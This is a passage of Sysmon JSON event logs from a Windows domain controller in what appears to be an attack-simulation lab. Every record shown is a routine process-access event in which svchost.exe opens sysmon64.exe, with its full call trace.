05:48:41.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3260,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3261,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3262,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3263,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3264,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3265,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3266,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3267,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 